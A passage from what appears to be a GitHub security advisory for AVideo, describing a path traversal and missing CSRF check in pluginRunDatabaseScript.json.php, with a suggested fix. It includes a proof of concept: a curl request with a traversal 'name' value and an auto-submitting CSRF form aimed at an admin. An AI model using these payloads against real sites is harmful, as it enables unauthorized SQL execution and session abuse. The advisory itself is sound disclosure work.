+ "details": "## Summary\n\nThe `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database.\n\n## Details\n\nThe vulnerable data flow:\n\n**1. Entry point** — `objects/pluginRunDatabaseScript.json.php:21`:\n```php\n$fileName = Plugin::getDatabaseFileName($_POST['name']);\n```\n\n**2. \"Sanitization\"** — `objects/plugin.php:343-354`:\n```php\npublic static function getDatabaseFileName($pluginName)\n{\n global $global;\n $pluginName = AVideoPlugin::fixName($pluginName); // line 347 — no-op\n $dir = $global['systemRootPath'] . \"plugin\";\n $filename = $dir . DIRECTORY_SEPARATOR . $pluginName . DIRECTORY_SEPARATOR . \"install\" . DIRECTORY_SEPARATOR . \"install.sql\";\n if (!file_exists($filename)) {\n return false;\n }\n return $filename;\n}\n```\n\n**3. The \"fix\"** — `plugin/AVideoPlugin.php:3184-3190`:\n```php\npublic static function fixName($name)\n{\n if ($name === 'Programs') {\n return 'PlayLists';\n }\n return $name; // Returns input unchanged for all other values\n}\n```\n\n**4. SQL execution** — `objects/pluginRunDatabaseScript.json.php:24-36`:\n```php\n$lines = file($fileName);\nforeach ($lines as $line) {\n // ...\n if (!$global['mysqli']->query($templine)) {\n $obj->msg = ('Error performing query \\'<strong>' . $templine . '\\': ' . $global['mysqli']->error);\n die($templine.' '.json_encode($obj)); // Leaks file content + SQL error\n }\n}\n```\n\nThe sibling endpoint `pluginRunUpdateScript.json.php` correctly routes through `AVideoPlugin::loadPlugin()` which sanitizes the name with `preg_replace('/[^0-9a-z_]/i', '', $name)` at `AVideoPlugin.php:395`. The vulnerable endpoint bypasses this sanitization entirely.\n\nAdditionally, the endpoint lacks CSRF token validation. The related `pluginImport.json.php` properly checks `isGlobalTokenValid()`, but `pluginRunDatabaseScript.json.php` does not, making it exploitable via cross-site request forgery against an authenticated admin.\n\n## PoC\n\n**Step 1: Direct exploitation (as admin)**\n\n```bash\n# Traverse to another plugin's install.sql (e.g., from CustomPlugin to LiveLinks)\ncurl -s -b \"PHPSESSID=<admin_session>\" \\\n -d \"name=../plugin/LiveLinks\" \\\n \"https://target.com/objects/pluginRunDatabaseScript.json.php\"\n```\n\nThis resolves to: `{root}/plugin/../plugin/LiveLinks/install/install.sql` and executes its SQL.\n\n**Step 2: CSRF exploitation (no direct admin access needed)**\n\nHost the following HTML on an attacker-controlled page and trick an admin into visiting it:\n\n```html\n<html>\n<body>\n<form action=\"https://target.com/objects/pluginRunDatabaseScript.json.php\" method=\"POST\" id=\"csrf\">\n <input type=\"hidden\" name=\"name\" value=\"../../attacker-controlled-path\" />\n</form>\n<script>document.getElementById('csrf').submit();</script>\n</body>\n</html>\n```\n\n**Step 3: Information disclosure via error messages**\n\nIf the traversed SQL file contains invalid SQL, lines 32-33 leak the raw file content in the error response:\n```json\n{\"error\":true,\"msg\":\"Error performing query '<strong>FILE CONTENT HERE': MySQL error...\"}\n```\n\n## Impact\n\n- **SQL injection via file inclusion**: An attacker can execute arbitrary SQL from any `install/install.sql` file reachable via path traversal, potentially creating admin accounts, modifying data, or extracting sensitive information.\n- **Information disclosure**: SQL execution errors leak raw file contents and MySQL error messages in the HTTP response.\n- **CSRF amplification**: The lack of CSRF protection means an external attacker can exploit this vulnerability by tricking an admin into visiting a malicious page, without needing direct admin credentials.\n- **Chaining potential**: If combined with any file-write primitive (e.g., GHSA-v8jw-8w5p-23g3, the plugin ZIP extraction RCE), an attacker can write a malicious `install.sql` file and then execute it via this endpoint.\n\n## Recommended Fix\n\nApply the same sanitization used by `loadPlugin()` to strip path traversal characters, and add CSRF token validation:\n\n```php\n// In objects/pluginRunDatabaseScript.json.php, after line 14:\n\n// Add CSRF protection\nif (!isGlobalTokenValid()) {\n die('{\"error\":\"' . __(\"Invalid token\") . '\"}');\n}\n\n// Sanitize plugin name before use (line 21)\n$pluginName = trim(preg_replace('/[^0-9a-z_]/i', '', $_POST['name']));\n$fileName = Plugin::getDatabaseFileName($pluginName);\n```\n\nAlternatively, fix `AVideoPlugin::fixName()` to apply proper sanitization for all callers:\n\n```php\npublic static function fixName($name)\n{\n if ($name === 'Programs') {\n $name = 'PlayLists';\n }\n return trim(preg_replace('/[^0-9a-z_]/i', '', $name));\n}\n```",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments